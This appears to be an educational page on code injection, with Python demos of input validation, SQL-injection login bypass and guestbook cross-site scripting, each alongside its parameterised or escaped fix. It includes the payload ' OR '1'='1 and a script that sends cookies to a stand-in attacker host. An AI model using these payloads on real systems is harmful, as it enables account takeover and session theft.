Code Injection
Code Injection is the general term for attack types that consist of injecting code that is then interpreted or executed by the application. This type of attack exploits poor handling of untrusted data. These attacks are usually made possible by a lack of proper input/output data validation, for example of:
- allowed characters (standard regular expression classes or custom)
- data format
- amount of expected data
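The three checks listed above, applied to a form submission, as an added example that is not part of the original page. The field names, the allow-list pattern and the length limit are assumptions chosen for the illustration; the sample submissions are constructed, one honest and one carrying injection payloads.

```python
import re
from datetime import datetime

# Hypothetical field rules for a sign-up form (assumed for this example).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")   # allowed characters + length
MAX_COMMENT_LEN = 500                                  # amount of expected data


def validate_username(value: str) -> bool:
    """Allow-list check: only the listed characters, 3 to 32 of them.
    A quote, space or semicolon fails here before it reaches any interpreter."""
    return bool(USERNAME_RE.fullmatch(value))


def validate_birthdate(value: str) -> bool:
    """Data-format check: strict ISO date with nothing trailing, plus a sane range."""
    try:
        d = datetime.strptime(value, "%Y-%m-%d")   # trailing junk raises ValueError
    except ValueError:
        return False
    return 1900 <= d.year <= datetime.now().year


def validate_comment(value: str) -> bool:
    """Amount-of-data check: bounded length. Characters are not restricted
    because this is free text, so it still needs output encoding later."""
    return 0 < len(value) <= MAX_COMMENT_LEN


def validate_form(form: dict) -> dict:
    """Return {field: error message} for every field that fails validation."""
    errors = {}
    if not validate_username(form.get("username", "")):
        errors["username"] = "only letters, digits, . _ - (3-32 chars)"
    if not validate_birthdate(form.get("birthdate", "")):
        errors["birthdate"] = "expected YYYY-MM-DD"
    if not validate_comment(form.get("comment", "")):
        errors["comment"] = f"1-{MAX_COMMENT_LEN} characters"
    return errors


# Constructed sample submissions.
GOOD = {"username": "alice_01", "birthdate": "1990-05-17", "comment": "Hello!"}
BAD = {
    "username": "admin' OR '1'='1",                  # SQL metacharacters
    "birthdate": "2020-13-01; DROP TABLE users",     # wrong format, trailing SQL
    "comment": "A" * 10_000,                         # far more data than expected
}

if __name__ == "__main__":
    print("good:", validate_form(GOOD))
    print("bad: ", validate_form(BAD))
```

Validation of this kind narrows what an interpreter can ever see, but it is a first line of defence only: the comment field shows that free-text input cannot be allow-listed and must still be handled safely at the point of use (parameterised queries, output encoding).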
Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers; SMTP headers; program arguments; etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.
Code Injection differs from Command Injection in that an attacker is limited only by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, they are limited only by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
Risk Factors
- These types of vulnerabilities can range from very hard to find to easy to find.
- If found, they are usually moderately hard to exploit, depending on the scenario.
- If successfully exploited, the impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability.
- Injection can sometimes lead to complete host takeover.
- Arbitrarily modify values in a database through a type of code injection called SQL injection. The impact of this can range from website defacement to serious compromise of sensitive data.
- Install malware or execute malicious code on a server by injecting server-side scripting code (such as PHP or ASP).
- Privilege escalation to root permissions by exploiting Shell Injection vulnerabilities in a setuid root binary on UNIX, or to Local System by exploiting a service on Windows.
- Attacking web users with HTML/Script Injection (Cross-site scripting).
Examples of code injection
SQL injection
SQL injection takes advantage of the syntax of SQL to inject commands that can read or modify a database, or compromise the meaning of the original query.
For example, consider a web page that has two fields to allow users to enter a user name and a password. The code behind the page will generate a SQL query to check the password against the list of user names:
SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password'
If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code (password' OR '1'='1) in the Password field, then the resulting query will look like this:
SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1'
In the example above, "password" is assumed to be blank or some innocuous string. Because '1'='1' is always true, and AND binds more tightly than OR, the WHERE clause matches every row; many rows are returned, thereby allowing access. For the same reason the user name does not actually need to be valid.
The technique may be refined to allow multiple statements to run, or even to load up and run external programs.
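The login check above, run against a small SQLite table so the bypass can be observed, as an added example that is not part of the original page. The `UserList` table and its two users are constructed; `login_vulnerable` builds the query by string concatenation exactly as the page describes, and `login_safe` is the parameterised form that a practitioner would write instead.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the page's UserList table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO UserList VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the SQL text from the raw field values, as in the page's example."""
    sql = ("SELECT UserList.Username FROM UserList WHERE UserList.Username = '"
           + username + "' AND UserList.Password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver passes the values separately from the
    SQL text, so a quote inside them can never change the statement's shape."""
    sql = ("SELECT UserList.Username FROM UserList "
           "WHERE UserList.Username = ? AND UserList.Password = ?")
    return conn.execute(sql, (username, password)).fetchone() is not None


PAYLOAD = "password' OR '1'='1"   # the page's injected Password value


def demo_sqli() -> dict:
    """Exercise both versions with honest credentials and with the payload."""
    conn = make_db()
    return {
        "valid_creds_vuln": login_vulnerable(conn, "alice", "s3cret"),
        "valid_creds_safe": login_safe(conn, "alice", "s3cret"),
        "wrong_pw_vuln": login_vulnerable(conn, "alice", "wrong"),
        "wrong_pw_safe": login_safe(conn, "alice", "wrong"),
        # valid user name plus the injected password, as on the page
        "inject_vuln": login_vulnerable(conn, "alice", PAYLOAD),
        # the OR clause covers the whole WHERE, so the user need not exist
        "inject_nouser_vuln": login_vulnerable(conn, "nobody", PAYLOAD),
        # the same payload is just a wrong password for the parameterised query
        "inject_safe": login_safe(conn, "alice", PAYLOAD),
    }


if __name__ == "__main__":
    for k, v in demo_sqli().items():
        print(f"{k}: {v}")
```

Whether the "multiple statements" refinement mentioned above works depends on the database and driver: SQLite's `execute()` refuses more than one statement, while other stacks accept stacked queries, which is why the parameterised form, not a character blacklist, is the fix.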
HTML script injection
A web server has a guestbook script, which accepts small messages from users, and typically receives messages such as
Nice bravo!
However, a malicious person may know of a code injection vulnerability in the guestbook, and enters a message such as
Bravo, u made it!
<script>document.location="http://hacker_attacker/cookie.cgi?" + document.cookie</script>
If another user views the page then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code:
That post was awesome, >:)
HTML/Script injection is a popular subject, commonly termed "Cross-Site Scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script (or something along such lines) is placed into the output HTML without being checked for HTML code or scripting.
Many of these problems are related to erroneous assumptions about what input data is possible, or about the effects of special data.
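The guestbook rendering described above, written both ways, as an added example that is not part of the original page. The three posts are the page's own messages, reconstructed as constructed sample input (the `<script>` element around the cookie-stealing line is assumed, since a browser only executes it inside such an element); `render_vulnerable` concatenates the raw text into the page and `render_safe` encodes it for an HTML text context first.

```python
import html


def _wrap(entries: str) -> str:
    """Assemble the guestbook page around the rendered entries."""
    return "<html><body><h1>Guestbook</h1>\n" + entries + "\n</body></html>"


def render_vulnerable(messages) -> str:
    """Places user text into the HTML unchanged, as the page's guestbook does."""
    return _wrap("\n".join("<p>" + m + "</p>" for m in messages))


def render_safe(messages) -> str:
    """Encodes <, >, &, ' and " so the browser treats each message as text."""
    return _wrap("\n".join("<p>" + html.escape(m, quote=True) + "</p>"
                           for m in messages))


# Constructed guestbook posts: the page's three examples.
POSTS = [
    "Nice bravo!",
    'Bravo, u made it!<script>document.location="http://hacker_attacker/cookie.cgi?" '
    '+ document.cookie</script>',
    "That post was awesome, >:)",
]


def contains_live_script(page: str) -> bool:
    """True if the page still carries a start tag the browser would execute."""
    return "<script" in page.lower()


def demo_xss() -> dict:
    vuln = render_vulnerable(POSTS)
    safe = render_safe(POSTS)
    return {
        # attacker's post becomes a real script element in the vulnerable page
        "vuln_has_script": contains_live_script(vuln),
        # after encoding it is inert text: &lt;script&gt;...
        "safe_has_script": contains_live_script(safe),
        # the innocent '>' in the smiley is also encoded, so no broken markup
        "safe_encodes_smiley": "&gt;:)" in safe,
        # the honest post is rendered verbatim either way
        "safe_keeps_plain_text": "<p>Nice bravo!</p>" in safe,
    }


if __name__ == "__main__":
    print(render_safe(POSTS))
```

Encoding on output is what makes both the deliberate payload and the accidental `>` harmless; the same stored text can be emitted into other contexts (an attribute, a URL, a script block), each of which needs its own encoder, so the encoding belongs at the point of output, not at the point of input.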
Other code injection vulnerabilities are